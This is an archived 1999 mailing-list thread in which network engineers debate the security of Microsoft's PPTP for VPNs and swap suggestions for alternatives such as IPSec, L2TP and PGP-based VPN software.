I wasn't being defensive. I was simply pointing out that everybody says 'X
stinks', but never gives a suggestion for something better. If you think
PPTP is so bad and the MS guys can't code, then code something yourself and
put it out for peer review. Maybe an open source equivalent to PPTP (IPSec
based? PGP based? ) is the answer and if people spent their time working on
that, instead of complaining about pptp, we'd have something usable.
I am also well aware of the 'every defense can be broken, given enough time
and money' and am also aware that every security solution is a balance of
cost of security versus cost of intrusion. I'm serious about wanting to
know specific alternatives to PPTP, their pros, cons, and pricetags.
People say IPSec, but until very recently (last 3-6 months), there was
almost no IPSec software available that was the equivalent in functionality
to PPTP. I found a PGP VPN software at NAI.com today and am going to test
that and am trying to get a cisco vpn client for testing with their pix, and
maybe that's the solution. We'll see. Anybody have any other specific
suggestions?
-----Original Message-----
From: Bob Dolliver [mailto:[EMAIL PROTECTED]]
Sent: Monday, December 27, 1999 2:37 PM
To: '[EMAIL PROTECTED]'; [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: RE: MS PPTP (Safe?) - alternative?
Microsoft has improved the security of the PPTP protocol to correct some of
the major weaknesses in the previous MSCHAP version 1, precisely because
other networks professionals pointed out weaknesses in the protocol after a
professional peer review. However the encryption strength of the MS-PPTP
still wholly relies on the password chosen by the users. As we all know
password based encryption schemes are open to dictionary and distributed
resource attacks. The point is not to bitch about anything, it is simply
pointing out that anyone interested in designing a secure VPN may have much
better choices than the MS PPTP protocol. L2TP with IPSec in transport mode
for example- if a VPN must support legacy networks, if the house is IP than
IPSec is the most logical choice. Professionals need to have this distrust
of their own work as well as the work of others, to participate in an
objective peer review system, no need to get defensive. As others have
pointed out already, the details of the deficiencies of the MS-PPTP protocol
can be found at www.counterpane.com
Regards
Robert Dolliver
Educational Services
Nortel Networks
1 Federal St.
Billerica Ma
PGP users my key server is located at:
pgpkeys.mit.edu
my key hash is:
71DD 037B AE30 C046 9D3B 795B D9CB 248D 44F0 1895
-----Original Message-----
From: [EMAIL PROTECTED] [SMTP:[EMAIL PROTECTED]]
Sent: Monday, December 27, 1999 12:22 PM
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: RE: MS PPTP (Safe?) - alternative?
This should instigate an interesting discussion. As I too am in a
Microsoft
shop, I would also be interested in some constructive answers to Paul's
questions.
> ----------
> From: Paul Gracy[SMTP:[EMAIL PROTECTED]]
> Sent: Monday, December 27, 1999 8:01 AM
> To: [EMAIL PROTECTED]
> Subject: RE: MS PPTP (Safe?) - alternative?
>
> Since I'm an engineer and just want to get some done from home...
>
> Ok. So a bunch of people dislike PPTP (version 1 and 2). But nobody has
> offered a constructive comment. So kindly do so, or quit your bitchin'.
>
> Constructive comments are defined in my world as 1 of these 3 things:
> 1) Do this and pptp is as safe as it gets. Your level of risk is X.
> Knowing this, use or don't, as you choose.
> 2) Use protocol / software XYZ as a replacement for PPTP; it only costs
> x$.
> 3) "I've written a replacement; source and binaries are available at
> www.____.___/pptp_replacement.html. Please perform peer review and let me
> know if you find any bugs."
>
> I'm waiting.......
>
> -----Original Message-----
> From: Brian Steele [ mailto:[EMAIL PROTECTED]
<mailto:[EMAIL PROTECTED]> ]
> Sent: Tuesday, December 14, 1999 11:34 AM
> To: [EMAIL PROTECTED]
> Subject: Re: MS PPTP (Safe?)
>
>
> ...and you can do this without being first authenticated by the NT server
> providing the VPN service?
>
> Brian Steele
>
>
> ----- Original Message -----
> From: <[EMAIL PROTECTED]>
> To: "Jimi Aleshin" <[EMAIL PROTECTED]>
> Cc: "J. T. B." <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>
> Sent: Tuesday, December 14, 1999 9:44 AM
> Subject: Re: MS PPTP (Safe?)
>
>
> >
> >
> >
> > One thing to remember, protocol 47 is GRE (Generic Route Encapsulation).
> > Remember the days of disabling
> > Source Route Forwarding at the TCP Layer ????
> > GRE is in it's basic form, the very same thing at the IP layer.
> >
> > What does this mean ????
> >
> > Well, I could send a GRE packet that contains another protocol in its
> payload.
> > This could be, for example, NETBIOS.
> > I could then use a GRE stream to browse your Windows NT domain.
> >
> > Please review RFC 1702 paying strong attention to the section on IP
> Source
> Route
> >
> > http://www.ietf.org/rfc/rfc1702.txt
<http://www.ietf.org/rfc/rfc1702.txt>
> >
> > After you read the RFC, you may want to consider the risks associated
> with
> it.
> >
> >
> >
> >
> >
> >
> >
> > "Jimi Aleshin" <[EMAIL PROTECTED]> on 12/13/99 05:45:38 PM
> >
> > Please respond to "Jimi Aleshin" <[EMAIL PROTECTED]>
> >
> > To: "J. T. B." <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
> > cc: (bcc: Jerry Kendall/Inc/Celestica)
> >
> > Subject: Re: MS PPTP (Safe?)
> >
> >
> >
> >
> > It is an implementation of PPP over TCP. This means that a user must
> already
> > have an Internet connection. The technology creates a second virtual PPP
> > network adapter. By using the native PPP authentication and encryption
> > services, the technology is easily implemented using existing
> technology.
> > Originally developed by Microsoft, U.S. Robotics (now 3Com), Ascend, and
> > other remote access companies.
> > In 1998, a severe flaw was found in PPTP's authentication scheme. This
> was
> > fixed in MS-CHAP V2 of Microsoft's implementation.
> > When setting up a PPTP server, you must enable port 1723 and protocol 47
> > through the firewall.
> > So try it out.
> >
> > /Jimi Aleshin
> > Mail: [EMAIL PROTECTED]
> > ICQ: 26180172
> >
> > ----- Original Message -----
> > From: J. T. B.
> > To: [EMAIL PROTECTED]
> > Sent: Monday, December 13, 1999 01:09 PM
> > Subject: MS PPTP (Safe?)
> >
> >
> >
> > I'm looking at building a secure VPN and was wondering if Microsoft's
> PPTP
> > was any good? I had heard some very bad things about it. Have they
> cleaned
> > it up, or should I look elsewhere?
> >
> > Thanks!
> >
> > ______________________________________________________
> > Get Your Private, Free Email at http://www.hotmail.com
<http://www.hotmail.com>
> > -
> > [To unsubscribe, send mail to [EMAIL PROTECTED] with
> > "unsubscribe firewalls" in the body of the message.]
> >
> > -
> > [To unsubscribe, send mail to [EMAIL PROTECTED] with
> > "unsubscribe firewalls" in the body of the message.]
> >
>
> -
> [To unsubscribe, send mail to [EMAIL PROTECTED] with
> "unsubscribe firewalls" in the body of the message.]
> -
> [To unsubscribe, send mail to [EMAIL PROTECTED] with
> "unsubscribe firewalls" in the body of the message.]
>
-
[To unsubscribe, send mail to [EMAIL PROTECTED] with
"unsubscribe firewalls" in the body of the message.]
-
[To unsubscribe, send mail to [EMAIL PROTECTED] with
"unsubscribe firewalls" in the body of the message.]
